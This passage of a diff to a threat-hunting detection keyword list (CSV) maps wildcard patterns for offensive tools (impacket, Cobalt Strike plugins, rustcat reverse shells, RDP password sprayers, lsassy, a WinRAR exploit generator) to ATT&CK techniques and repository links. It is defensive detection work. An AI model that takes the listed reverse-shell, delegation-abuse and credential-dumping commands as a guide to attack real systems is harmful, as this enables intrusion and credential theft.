T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*rar2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*rar2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*rar2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*rarce *.pdf *.rar*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*rarce *.rar*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*rarce-1.0.0.tar.gz*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" @@ -15565,19 +15735,28 @@ "*ratchatpt-main*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","0","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*ratchatpt-main*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" "*raw*/straight-shooter.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" -"*raw_keylogger.tar.gz*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","126","37","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" -"*rawrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*rawSHA1_linkedIn_fmt_plug*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*raw_keylogger.tar.gz*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","1","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"*rawrelayserver.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rawSHA1_linkedIn_fmt_plug*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*rbcd.py -delegate-from * -delegate-to * -dc-ip * -action write *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*rbcd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*RBCD_Petitpotam_VulnerableServers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*rbsec/dnscan*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","984","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" +"*rbcd.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*RBCD_Petitpotam_VulnerableServers.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*rbsec/dnscan*","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","1","N/A","6","10","985","413","2022-08-09T11:11:31Z","2013-03-13T10:42:07Z" "*rc4.py *.bin*","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","0","N/A","10","3","221","33","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" +"*rcan listen -ib *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat c -s bash *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat connect -s bash*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat listen 55660*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat listen -ie *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat listen -l *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat-v3.*darwin-aarch64*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat-v3.*-darwin-x86_64*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*rcat-v3.*-linux-x86_64*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" "*RCE-exploits*","offensive_tool_keyword","POC","poc rce - The exploit samples database is a repository for RCE (remote code execution) exploits and Proof-of-Concepts for WINDOWS. the samples are uploaded for education purposes for red and blue teams.","T1059.001 - T1210.001 - T1212 - T1055.012","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/smgorelik/Windows-RCE-exploits","1","1","N/A","N/A","8","731","187","2019-07-29T23:28:15Z","2018-02-13T11:23:40Z" -"*RDE1-main.zip*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","30","2","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*RDE1-main.zip*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*rdi_net_user.cpp*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" -"*rdp_check.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*rdp_doublepulsar_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*rdp_check.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rdp_doublepulsar_rce.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*RDPassSpray.*.log*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*RDPassSpray.csv*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" "*RDPassSpray.py*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" @@ -15600,59 +15779,59 @@ "*RDPSpray*","offensive_tool_keyword","RDPSpray","Tool for password spraying RDP","T1110.001 - T1555.002","TA0006 - TA0040 - TA0003","N/A","N/A","Credential Access","https://github.com/dafthack/RDPSpray","1","1","N/A","N/A","1","89","40","2018-10-12T18:32:51Z","2018-10-12T18:29:52Z" "*RdpThief*","offensive_tool_keyword","RdpThief","RdpThief by itself is a standalone DLL that when injected in the mstsc.exe process. will perform API hooking. extract the clear-text credentials and save them to a file. An aggressor script accompanies it. which is responsible for managing the state. monitoring for new processes and injecting the shellcode in mstsc.exe. The DLL has been converted to shellcode using the sRDI project (https://github.com/monoxgas/sRDI). When enabled. RdpThief will get the process list every 5 seconds. search for mstsc.exe. and inject to it","T1055 - T1547 - T1059 - T1078","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","1","N/A","N/A","10","1014","503","2019-11-13T14:13:52Z","2019-11-03T17:54:38Z" "*RdpThief.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" -"*rdrleakdiag.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" +"*rdrleakdiag.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" "*read_cs_teamserver*","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","1894","321","2023-08-08T20:02:44Z","2020-01-16T16:39:09Z" "*readShellcode*","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","875","158","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*ReadyToPhish.xls*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*RealBey/ThisIsNotRat*","offensive_tool_keyword","ThisIsNotRat","control windows computeur from telegram","T1098 - T1079 - T1105 - T1047 - T1059","TA0010 - TA0009 - TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RealBey/ThisIsNotRat","1","1","N/A","9","10","49","18","2023-09-10T07:39:38Z","2023-09-07T14:07:32Z" "*realgam3*","offensive_tool_keyword","Github Username","github user Security Researcher @F5Networks hosting reverse tools and other pentester tools for data exfiltration and password attacks","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/realgam3","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Real-Passwords*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1614","2021-12-21T18:14:59Z","2017-04-16T17:08:27Z" -"*Reaper.exe kp *","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*Reaper.exe sp *","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" -"*Reaper-main.zip*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","61","18","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*Real-Passwords*","offensive_tool_keyword","Probable-Wordlists","Password wordlists","T1110 - T1114","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/berzerk0/Probable-Wordlists","1","1","N/A","N/A","10","8139","1615","2023-10-04T20:22:09Z","2017-04-16T17:08:27Z" +"*Reaper.exe kp *","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*Reaper.exe sp *","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" +"*Reaper-main.zip*","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" "*rebootuser/LinEnum*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - 